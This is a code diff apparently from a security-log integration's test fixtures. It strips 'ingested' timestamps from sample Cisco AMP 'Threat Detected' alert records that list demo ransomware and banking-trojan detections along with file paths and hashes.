@@ -460,7 +455,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422878465Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -544,7 +538,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422879320Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -628,7 +621,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422880138Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -712,7 +704,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422880952Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -796,7 +787,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422881765Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -880,7 +870,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422882597Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -964,7 +953,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422883705Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1048,7 +1036,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422884705Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1132,7 +1119,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422885600Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1216,7 +1202,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422886872Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1300,7 +1285,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422887751Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1384,7 +1368,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422888782Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1468,7 +1451,6 @@ ], "code": "1090519054", "id": "6176259080131183000", - "ingested": "2022-02-02T05:52:33.422889642Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -1548,7 +1530,6 @@ ], "code": "1090519054", "id": "6159251507855229000", - "ingested": "2022-02-02T05:52:33.422890539Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1632,7 +1613,6 @@ ], "code": "1090519054", "id": "6159251507855229000", - "ingested": "2022-02-02T05:52:33.422891435Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1716,7 +1696,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422892365Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
